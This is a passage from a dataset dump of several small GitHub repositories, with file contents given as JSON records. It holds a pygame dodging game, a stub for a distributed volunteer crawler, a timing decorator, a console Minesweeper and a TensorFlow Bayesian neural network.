== K_LSHIFT):\n\t\t\t\tpaused = not paused\n\tif not paused:\n\t\tx_accel = x_speed * 0.1\n\t\ty_accel = y_speed * 0.1\n\t\tx_accel = abs(x_accel)\n\t\ty_accel = abs(y_accel)\n\t\tx_accel = constrain(x_accel, 3, 5)\n\t\ty_accel = constrain(y_accel, 3, 5)\n\t\tif Xkeys[K_RIGHT]: x_speed += x_accel\n\t\tif Xkeys[K_LEFT]: x_speed -= x_accel\n\t\tif Xkeys[K_UP]: y_speed -= y_accel\n\t\tif Xkeys[K_DOWN]: y_speed += y_accel\n\t\tif Xkeys[K_ESCAPE]: sys.exit(0)\n\t\tx_speed *= friction\n\t\ty_speed *= friction\n\t\tx += x_speed\n\t\ty += y_speed\n\t\tx_speed = constrain(x_speed, -20, 20)\n\t\ty_speed = constrain(y_speed, -20, 20)\n\t\tscreen.fill(WHITE)\n\t\tdelete = 0\n\t\tcntdwn = ''\n\t\tif sld > 0:\n\t\t\tsld -= 1\n\t\t\tif sld == 0:\n\t\t\t\tchange_sp(10) \n\t\tdel_slow = False\n\t\tfor ball in balls:\n\t\t\tball['x'] += ball['xsp']\n\t\t\tball['y'] += ball['ysp']\n\t\t\tif ball['x'] < ball_rad or ball['x'] >= (screen.get_width() - ball_rad) or random.uniform(1, 50) < 1.5:\n\t\t\t\tball['xsp'] *= -1\n\t\t\tif ball['y'] < ball_rad or ball['y'] >= (screen.get_height() - ball_rad) or random.uniform(1, 50) < 1.5:\n\t\t\t\tball['ysp'] *= -1\n\t\t\tball['x'] = constrain(ball['x'], ball_rad, screen.get_width() - ball_rad)\n\t\t\tball['y'] = constrain(ball['y'], ball_rad, screen.get_height() - ball_rad)\n\t\t\tpygame.draw.circle(screen, ball['color'], (int(ball['x']),int(ball['y'])), ball_rad)\n\t\t\txdis = x - ball['x']\n\t\t\tydis = y - ball['y']\n\t\t\tif ydis * ydis + xdis * xdis < ball_rad * 
4 * ball_rad:\n\t\t\t\tif ball['Type'] == 1:\n\t\t\t\t\treset_balls(True)\n\t\t\t\telif ball ['Type'] == 3:\n\t\t\t\t\tsld += 400\n\t\t\t\t\tchange_sp(5)\n\t\t\t\t\tdel_slow = True\n\t\t\t\telif ball['Type'] == 4:\n\t\t\t\t\tB_live -= 1\n\t\t\t\t\tif lives < 10:\n\t\t\t\t\t\tlives += 1\n\t\t\t\t\tdelete = ball\n\t\t\t\telse:\n\t\t\t\t\tlives -= 1\n\t\t\t\t\tdmgB -= 1\n\t\t\t\t\treset_balls(False)\n\t\t\t\t\tif lives < 1:\n\t\t\t\t\t\tsys.exit(0)\n\t\tif delete != 0: balls.remove(delete)\n\t\tif del_slow:\n\t\t\tfor i in reversed(range(len(balls))):\n\t\t\t\tif balls[i]['Type'] == 3:\n\t\t\t\t\tballs.remove(balls[i])\n\t\tif sld > 0:\n\t\t\tcntdwn = ' DECREASED SPEED FOR ' + str(sld / FRAMES_PER_SECOND)\n\t\ttext = font.render('LEVEL: ' + str(lev) + ' LIVES: ' + str(lives) + cntdwn, False, (0, 0, 0))\n\t\tscreen.blit(text, (0, 0))\n\t\tx = constrain(x, ball_rad, screen.get_width() - ball_rad)\n\t\ty = constrain(y, ball_rad, screen.get_height() - ball_rad)\n\t\tpygame.draw.circle(screen, (0, 0, 0), (int(x), int(y)), ball_rad)\n\t\tpygame.display.flip()"
}
] | 1 |
JaydenOwenoble/9shu
|
https://github.com/JaydenOwenoble/9shu
|
be9b54a4602f7c2c8fd0dc7d8083ba54fdd032d2
|
904dc876b6dbb357de8c8e779aa77ef196c711db
|
37879bb06bac3d0799cf6cc786bda2b2a5bd0a75
|
refs/heads/master
| 2023-04-22T06:44:28.624663 | 2018-06-27T00:57:24 | 2018-06-27T00:57:24 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48336413502693176,
"alphanum_fraction": 0.48983365297317505,
"avg_line_length": 22.044445037841797,
"blob_id": "0e8402d51d811d8a9fe1d6fcce3ee487aba6e403",
"content_id": "3b4e6413d9745e1d01646e5aee6b49fa7ecf11cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 45,
"path": "/src/volunteer/net_opt.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\nimport conf\r\nimport json\r\nimport logging\r\nimport socket\r\nfrom task_interact import glb_task_interact\r\n\r\n\r\nclass NetOpt(object):\r\n def __init__(self):\r\n pass\r\n\r\n def listen_tasks(self):\r\n skt = socket.socket()\r\n skt.bind((\"\", conf.listen_task_port))\r\n skt.listen(1)\r\n\r\n while 1:\r\n cli, addr = skt.accept()\r\n req_data = \"\"\r\n while True:\r\n data = cli.recv(1024)\r\n if not data:\r\n break\r\n req_data += data\r\n cli.close()\r\n reqs_dict = self.__structuring_reqs(req_data)\r\n task_rst = glb_task_interact.exeTask(reqs_dict)\r\n print task_rst\r\n\r\n # 请求结构化\r\n # {id: (req_mod, url, header, post_data)}\r\n # header: {key: val}\r\n # post_data: {key: val}\r\n def __structuring_reqs(self, reqs_str):\r\n json_struct = None\r\n try:\r\n json_struct = json.loads(reqs_str)\r\n except:\r\n pass\r\n return json_struct\r\n\r\n\r\nglb_net_opt = NetOpt()\r\n"
},
{
"alpha_fraction": 0.6541095972061157,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 16.375,
"blob_id": "d7f423fdd750b9b9dbe2d5b18da1ed96af381d94",
"content_id": "17616436a2ffebe897f8d0f5dff44948c10508f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 16,
"path": "/src/task_manager/shu9_scrape_agent.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __SHU9_SCRAPE_AGENT_H__\r\n#define __SHU9_SCRAPE_AGENT_H__\r\n\r\n#include \"interfaces/scrape_agent.h\"\r\n\r\n\r\nclass Shu9ScrapeAgent : public IScrapeAgent\r\n{\r\n public:\r\n // Implement IScrapeAgent\r\n const char* scrapeHtmls(const char* req);\r\n const char* getQuality();\r\n};\r\n\r\n\r\n#endif"
},
{
"alpha_fraction": 0.6414141654968262,
"alphanum_fraction": 0.6565656661987305,
"avg_line_length": 11.199999809265137,
"blob_id": "c67c65f2d6f8f6ca62441a191fe04ebb3f908f6b",
"content_id": "bb29a6dbb3609735d81a44c90505010807f06105",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/src/task_manager/shu9_scrape_agent.cpp",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#include \"shu9_scrape_agent.h\"\r\n\r\n\r\nconst char*\r\nShu9ScrapeAgent::scrapeHtmls(const char* req)\r\n{\r\n return nullptr;\r\n}\r\n\r\n\r\nconst char*\r\nShu9ScrapeAgent::getQuality()\r\n{\r\n return nullptr;\r\n}\r\n"
},
{
"alpha_fraction": 0.5162790417671204,
"alphanum_fraction": 0.5209302306175232,
"avg_line_length": 14.538461685180664,
"blob_id": "3a931c49051e8a3bc75b4d59075f5521be245908",
"content_id": "8022843f617de9aaa3321e689b89ebac0dce940c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 13,
"path": "/src/volunteer/task_interact.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\n\r\nclass TaskInteract(object):\r\n def __init__(self):\r\n pass\r\n\r\n def exeTask(self, req_dict):\r\n rst = \"\"\r\n return req_dict\r\n\r\n\r\nglb_task_interact = TaskInteract()\r\n"
},
{
"alpha_fraction": 0.5337423086166382,
"alphanum_fraction": 0.546012282371521,
"avg_line_length": 10.538461685180664,
"blob_id": "02af514fc7e523b3ed57ef865d6861381ad0b19f",
"content_id": "d6affa0d828a0bb4ed70d0299c3e128d617372e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 13,
"path": "/src/task_manager/store.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_STORE_H__\r\n#define __IF_STORE_H__\r\n\r\n\r\nclass IStore\r\n{\r\n public:\r\n virtual bool saveRsps() = 0;\r\n virtual bool getReqs() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.5449735522270203,
"alphanum_fraction": 0.5476190447807312,
"avg_line_length": 19,
"blob_id": "84e69454929e13e3cd9a01dde6e7dae6869edc7a",
"content_id": "60e71017dd5699933e4607fd26e058db45082364",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 18,
"path": "/src/volunteer/main.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\nimport logging\r\nlogging.basicConfig(\r\n level = logging.DEBUG,\r\n format = '%(asctime)s|%(levelname)s|%(filename)s:%(lineno)d|%(message)s',\r\n datefmt = '%Y%m%d_%H%M%S',\r\n filename = './ou.log',\r\n filemode = 'w'\r\n)\r\nfrom net_opt import glb_net_opt\r\n\r\ndef main():\r\n glb_net_opt.listen_tasks()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n"
},
{
"alpha_fraction": 0.5933333039283752,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 10.5,
"blob_id": "4459f7bc38c1ac8604547032104659460f73fb19",
"content_id": "16096f7afebeba47c1056a937d1d0aedb44ede5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 12,
"path": "/src/task_manager/companions.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_COMPANIONS_H__\r\n#define __IF_COMPANIONS_H__\r\n\r\n\r\nclass ICompanions\r\n{\r\n public:\r\n virtual bool sendHeartBeat() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.6128440499305725,
"alphanum_fraction": 0.6165137887001038,
"avg_line_length": 17.464284896850586,
"blob_id": "6ed40d00087b67ddfbb3fc032bd73295e7b8e746",
"content_id": "41ef68a4f4ccc31d67203fce0b242ab53a292455",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 28,
"path": "/src/task_manager/scrape_agent.h",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "#ifndef __IF_SCRAPE_AGENT_H__\r\n#define __IF_SCRAPE_AGENT_H__\r\n\r\n\r\nenum ScrapeStatus\r\n{\r\n SCRAPE_OK,\r\n SCRAPE_FAIL\r\n};\r\n\r\n\r\n/** Scrape agent interface\r\n * function: By this interface you can control one scrape.\r\n */\r\nclass IScrapeAgent\r\n{\r\n public:\r\n /** Scrape htmls\r\n * function: Get a batch of htmls by a batch of requests.\r\n * desc: This is a block function. */\r\n virtual ScrapeStatus scrapeHtmls(const char* req) = 0;\r\n\r\n /** Get the capacity of scrape. */\r\n virtual const char* getQuality() = 0;\r\n};\r\n\r\n\r\n#endif\r\n"
},
{
"alpha_fraction": 0.4441087543964386,
"alphanum_fraction": 0.4501510560512543,
"avg_line_length": 18.47058868408203,
"blob_id": "3cf5a1db1ea74ca6c248f66b641d0dd7f75f6f59",
"content_id": "f15f281b0fd07091b6b4b104307ac87c58c855b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 479,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/README.md",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# 9shu\n- 分布式志愿者爬虫系统\n\n# 目录结构\n```\n├── build.sh # 编译程序\n├── README.md\n└── src/ # 存放源码\n ├── common/ # 通用部分\n ├── spider_svc/ # 爬虫业务模块\n ├── storekeeper/ # 存储模块\n ├── task_manager/ # 任务管理模块\n └── volunteer/ # 志愿者模块\n```\n\n# 文档\n- 见[wiki](https://github.com/bcyxy/9shu/wiki)\n"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 13,
"blob_id": "d4fb6b63bc08e7d72e86cdb7b452b96b0ae3db41",
"content_id": "cb4277a926447df1e7f2099be5be15f95ea07f5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 60,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 4,
"path": "/src/volunteer/conf.py",
"repo_name": "JaydenOwenoble/9shu",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\r\n\r\n# task\r\nlisten_task_port = 20186\r\n"
}
] | 10 |
pgugninskiy/B5.9.1gugp
|
https://github.com/pgugninskiy/B5.9.1gugp
|
5dc81300b04923410c6dcd21ad2d14fee4996321
|
ce8ad6492f2f16fcb0451a99588d38e9d937d4e1
|
62be4c125f756476c24c416a8cc27db2e0dc4dd6
|
refs/heads/master
| 2022-11-16T21:07:01.974220 | 2020-07-12T17:59:04 | 2020-07-12T17:59:04 | 279,119,158 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4848144054412842,
"alphanum_fraction": 0.5039370059967041,
"avg_line_length": 25.65625,
"blob_id": "7bf430029be8c121cf2ec484de5ff6fdb975cd06",
"content_id": "4d55c81e76399f56d39345c623e457445dc7c4cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 962,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 32,
"path": "/decorate.py",
"repo_name": "pgugninskiy/B5.9.1gugp",
"src_encoding": "UTF-8",
"text": "import time\r\nclass Secundomer:\r\n def __init__(self,iters):\r\n self.iters = iters\r\n\r\n def __call__(self,f):\r\n def wrapper(*args, **kwargs):\r\n avg_time = 0\r\n for i in range(self.iters) :\r\n t0 = time.time()\r\n return_value = f(*args, **kwargs)\r\n t1 = time.time()\r\n avg_time += (t1 - t0)\r\n avg_time /= self.iters\r\n print(\"Выполнение заняло %.5f секунд\" % avg_time)\r\n return return_value\r\n return wrapper\r\n\r\n def __enter__(self):\r\n self.t0 = time.time\r\n return self.t0\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.t1 = time.time\r\n\r\nprint(\"Пожалуиста, введите количество циклов для расчета скорости\")\r\na=int(input())\r\n@Secundomer(iters=a)\r\ndef Hrono():\r\n for i in range(1,1000000):\r\n pass\r\nHrono()\r\n\r\n\r\n"
}
] | 1 |
haotiaz/Minesweeper
|
https://github.com/haotiaz/Minesweeper
|
fc1f47b8adedb62149da170348a2c5d65f4f86b3
|
fc51c3fd8e8cd1aaaee05cc958a439b0191cee21
|
da6ce15a1d4c1069dcffe0284d1ef49fd95243ff
|
refs/heads/master
| 2020-04-05T03:06:42.212267 | 2018-11-07T06:40:14 | 2018-11-07T06:40:14 | 156,501,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4417688846588135,
"alphanum_fraction": 0.46085113286972046,
"avg_line_length": 29.566667556762695,
"blob_id": "8add2638874d65de8ac007f18b2e9dc9fd14a74b",
"content_id": "61fc98a554be1b606e61c1a70bc9461f01970f7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6603,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 210,
"path": "/Minesweeper.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 11:42:40 2018\n\n@author: apple\n\"\"\"\n\nfrom Square import Square\nfrom random import choice\n\nclass Minesweeper():\n def __init__(self,a,b,bomb):\n self.height=a\n self.length=b\n self.board=[]\n self.bombNum=bomb\n self.status='In progress'\n for y in range(a):\n self.board.append([])\n for x in range(b):\n self.board[y].append(Square())\n #randomly assign bombs\n for n in range(bomb):\n chosenSquare=choice(choice(self.board))\n while chosenSquare.getBomb():\n chosenSquare=choice(choice(self.board))\n chosenSquare.setBomb(True)\n \n def printBoard(self):\n firstLine=' '\n for a in range(1,self.length+1):\n firstLine=firstLine+str(a)+' '\n print(firstLine[0:-1])\n lineNum=1\n for line in self.board:\n lineText=str(lineNum)+' '\n for square in line:\n lineText=lineText+square.getText()+' '\n print(lineText[0:-1])\n lineNum=lineNum+1\n \n def checkValid(self,y,x):\n if y>self.height or x>self.length or x<1 or y<1:\n return False\n if self.board[y-1][x-1].isSelected():\n return False\n return True\n \n def select(self,y,x):\n if self.checkValid(y,x) and not(self.board[y-1][x-1].isFlagged()):\n square=self.board[y-1][x-1]\n square.beSelected()\n square.changeText(self.surrounding(y-1,x-1))\n if self.surrounding(y-1,x-1)=='0':\n self.autoSelect(y,x)\n else:\n print('Invalid Input')\n \n def getStatus(self):\n return self.status\n \n def setStatus(self,status):\n self.status=status\n \n def flag(self,y,x):\n if self.checkValid(y,x):\n if not self.board[y-1][x-1].isFlagged():\n self.board[y-1][x-1].beFlagged()\n self.board[y-1][x-1].changeText('F')\n else:\n print('Invalid Input')\n else:\n print('Invalid Input')\n \n def unflag(self,y,x):\n if self.checkValid(y,x):\n if self.board[y-1][x-1].isFlagged():\n self.board[y-1][x-1].beUnflagged()\n self.board[y-1][x-1].changeText('-')\n else:\n print('Invalid Input')\n else:\n print('Invalid Input')\n \n def _getSolution(self):\n for a in range(len(self.board)):\n for b in range(len(self.board[0])):\n if self.board[a][b].getBomb():\n self.board[a][b].changeText('B')\n else:\n self.board[a][b].changeText(self.surrounding(a,b))\n \n def surrounding(self,y,x):\n '''y,x start from 0'''\n bombNum=0\n try:\n if self.board[y+1][x].getBomb():\n if y+1==len(self.board):\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y+1][x+1].getBomb():\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y+1][x-1].getBomb():\n if x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y][x+1].getBomb():\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y][x-1].getBomb():\n if x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y-1][x].getBomb():\n if y-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y-1][x+1].getBomb():\n if y-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y-1][x-1].getBomb():\n if y-1<0 or x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n return str(bombNum)\n \n def selectFirst(self,y,x):\n if self.board[y-1][x-1].getBomb():\n newSquare=choice(choice(self.board))\n while newSquare.getBomb():\n newSquare=choice(choice(self.board))\n self.board[y-1][x-1].setBomb(False)\n newSquare.setBomb(True)\n self.select(y,x)\n \n def autoSelect(self,y,x):\n b=y-1\n a=x\n if self.checkValid(b,a) 
and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y-1\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y-1\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n \n def isWin(self):\n nonBomb=self.height*self.length-self.bombNum\n select=0\n for line in self.board:\n for square in line:\n if square.getText() in ['0','1','2','3','4','5','6','7','8']:\n select=select+1\n if select==nonBomb:\n return True\n else:\n return False\n \n def showAllBombs(self):\n for line in self.board:\n for square in line:\n if square.getBomb():\n square.changeText('B')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n "
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 27,
"blob_id": "9aa0d128de01d21cc762ded48677a25929b93097",
"content_id": "9aaa87ca8b0086b11717e7a4216fce9913dade51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/readme.txt",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "This is a minesweeper game."
},
{
"alpha_fraction": 0.5247336626052856,
"alphanum_fraction": 0.5327244997024536,
"avg_line_length": 33.24324417114258,
"blob_id": "e8d015b62ca2d08a0ce8d289571410e95067c02b",
"content_id": "70a2c6912efba502e8d439f7fab9a42486429cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2640,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 74,
"path": "/Driver.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 11:46:49 2018\n\n@author: apple\n\"\"\"\nfrom Minesweeper import Minesweeper\n\nwin=0\nlose=0\nwhile True:\n height=int(input('Enter a height: '))\n length=int(input('Enter a length: '))\n bomb=int(input('Enter the number of bombs: '))\n while bomb>height*length:\n print('Invalid Input')\n height=int(input('Enter a height: '))\n length=int(input('Enter a length: '))\n bomb=int(input('Enter the number of bombs: '))\n minesweeper=Minesweeper(height,length,bomb)\n #minesweeper._getSolution()\n minesweeper.printBoard()\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n while not minesweeper.checkValid(y,x):\n print('Invalid Input')\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.selectFirst(y,x)\n minesweeper.printBoard()\n if minesweeper.isWin():\n win=win+1\n print('You win')\n again=input('Do you want to play again (\"yes\" or \"no\")? ')\n if again=='yes':\n continue\n elif again=='no':\n print('Win:'+str(win)+' Lose:'+str(lose))\n break\n while True:\n choice=input('“select” or “flag” or “unflag”? ')\n if choice=='select':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n if minesweeper.checkValid(y,x) and minesweeper.board[y-1][x-1].getBomb():\n minesweeper.showAllBombs()\n minesweeper.printBoard()\n minesweeper.setStatus('lose')\n print('Bomb! You lose')\n lose=lose+1\n break\n minesweeper.select(y,x)\n minesweeper.printBoard()\n if minesweeper.isWin():\n win=win+1\n print('You win')\n break\n elif choice=='flag':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.flag(y,x)\n minesweeper.printBoard()\n elif choice=='unflag':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.unflag(y,x)\n minesweeper.printBoard()\n again=input('Do you want to play again (\"yes\" or \"no\")? ')\n if again=='yes':\n continue\n elif again=='no':\n print('Win:'+str(win)+' Lose:'+str(lose))\n break\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n "
},
{
"alpha_fraction": 0.5228365659713745,
"alphanum_fraction": 0.5396634340286255,
"avg_line_length": 17.93181800842285,
"blob_id": "390a0fd6982006ff83802d33301e344a08b58cd3",
"content_id": "9e2136340dcd10aa92f9d1a9ad35248fd2cb70dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 44,
"path": "/Square.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 29 20:05:43 2018\n\n@author: apple\n\"\"\"\n\nclass Square:\n def __init__(self):\n self.text='-'\n self.selected=False\n self.flagged=False\n self.isBomb=False\n \n def beSelected(self):\n self.selected=True\n \n def isSelected(self):\n return self.selected\n \n def beFlagged(self):\n self.flagged=True\n \n def beUnflagged(self):\n self.flagged=False\n \n def setText(self,t):\n self.text=t\n \n def getText(self):\n return self.text\n \n def getBomb(self):\n return self.isBomb\n \n def setBomb(self,b):\n self.isBomb=b\n \n def isFlagged(self):\n return self.flagged\n \n def changeText(self,text):\n self.text=text"
}
] | 4 |
SebastianPopescu/Bayesian_Neural_Network
|
https://github.com/SebastianPopescu/Bayesian_Neural_Network
|
b2dd68630b0fdde9e2b8ac38ac5be7ec23663d0d
|
b6642c7b637f562af37735069d7f0e197d02d09e
|
a1481033a28cd08e78e6670cb4ae150596d74ce1
|
refs/heads/master
| 2020-02-29T02:26:59.827361 | 2017-04-14T20:41:10 | 2017-04-14T20:41:10 | 88,281,386 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6499068737030029,
"alphanum_fraction": 0.6741154789924622,
"avg_line_length": 35.03960418701172,
"blob_id": "78d1d7ec6e1eda1de7caee8f458a7be7354454b4",
"content_id": "017150f8b86dcc451c8b39d4544c0cf7f29c4ad7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3759,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 101,
"path": "/Bayesian_Neural_Network.py",
"repo_name": "SebastianPopescu/Bayesian_Neural_Network",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport tensorflow as tf\r\nfrom collections import defaultdict\r\n\r\n\r\n\r\nclass Bayesian_Neural_Network(object):\r\n\r\n\tdef __init__(self,num_data,num_test,num_minibatch,dim_layers,dim_input,dim_output,num_hidden_layers):\r\n\r\n\t\tself.sess = tf.Session()\r\n\t\tself.num_data = num_data\r\n\t\tself.num_test = num_test\r\n\t\tself.num_minibatch = num_minibatch\r\n\t\tself.dim_layers = dim_layers\r\n\t\tself.dim_input = dim_input\r\n\t\tself.dim_output =dim_output\r\n\t\tself.num_hidden_layers = num_hidden_layers\r\n\t\tself.X_train = tf.placeholder(shape=(self.num_data,self.dim_input),dtype=tf.float32)\r\n\t\tself.Y_train = tf.placeholder(shape=(self.num_data,self.dim_output),dtype=tf.float32)\r\n\r\n\t\tself.X_test = tf.placeholder(shape=(self.num_test,self.dim_input),dtype=tf.float32)\r\n\t\tself.Y_test = tf.placeholder(shape=(self.num_test,self.dim_output),dtype=tf.float32)\r\n\r\n\t\tself.W_mean = defaultdict()\r\n\t\tself.W_var =defaultdict()\r\n\t\tself.W_var_chol = defaultdict()\r\n\t\tself.W_var_chol_plm = defaultdict()\r\n\t\tself.b = defaultdict()\r\n\t\t\r\n\r\n\t\tfor l in range(1,self.num_hidden_layers+2):\r\n\r\n\t\t\tself.W_mean[l] = []\r\n\t\t\tself.W_var_chol[l] = []\r\n\t\t\tself.W_var_chol_plm[l] =[]\r\n\t\t\tself.b[l] = tf.Variable(tf.ones(shape=(self.dim_layers[l],)))\r\n\t\t\tfor j in range(self.dim_layers[l]):\r\n\t\t\t\t\r\n\t\t\t\tself.W_mean[l].append(tf.Variable(tf.random_normal(shape=(self.dim_layers[l-1],1)),dtype=tf.float32))\r\n\t\t\t\tself.W_var_chol_plm[l].append(tf.Variable(tf.random_normal(shape=(self.dim_layers[l-1],self.dim_layers[l-1])),dtype=tf.float32))\r\n\t\t\t\tself.W_var_chol[l].append(tf.matrix_band_part(self.W_var_chol_plm[l][j],-1,0))\r\n\r\n\r\n\tdef hidden_layer(self,forward_layer_number,input):\r\n\r\n\t\tw_values_list_overall = []\r\n\t\tfor j in range(self.dim_layers[forward_layer_number]):\r\n\t\t\tw_values_list = []\r\n\t\t\tfor i in range(500):\r\n\r\n\t\t\t\tnormal_distribution_sampled = tf.random_normal(shape=(self.dim_layers[forward_layer_number-1],1))\r\n\t\t\t\tw_values_list.append(tf.reshape(tf.add(tf.matmul(self.W_var_chol[forward_layer_number][j],normal_distribution_sampled),self.W_mean[forward_layer_number][j]),shape=(self.dim_layers[forward_layer_number-1],)))\r\n\t\t\t\r\n\t\t\tw_values_list_overall.append(w_values_list)\r\n\t\t\r\n\t\tw_values_list_overall = tf.div(tf.add_n(w_values_list_overall),500.0) \t\t\r\n\t\tcurrent_w_transposed = tf.stack(w_values_list_overall)\r\n\r\n\t\toutput_temp = tf.add(tf.matmul(input,tf.transpose(current_w_transposed)),self.b[forward_layer_number])\r\n\r\n\t\toutput = tf.nn.relu(output_temp)\r\n\r\n\t\treturn output\r\n\r\n\tdef predict(self,X):\r\n\r\n\t\tinput = self.hidden_layer(1,X)\r\n\r\n\t\tfor l in range(2,self.num_hidden_layers+2):\r\n\t\t\tinput = self.hidden_layer(l,input)\r\n\r\n\t\treturn input\r\n\r\n\tdef session_TF(self,X_train,Y_train):\r\n\r\n\t\tpredictions_training = self.predict(X= self.X_train)\r\n\t\tcost = 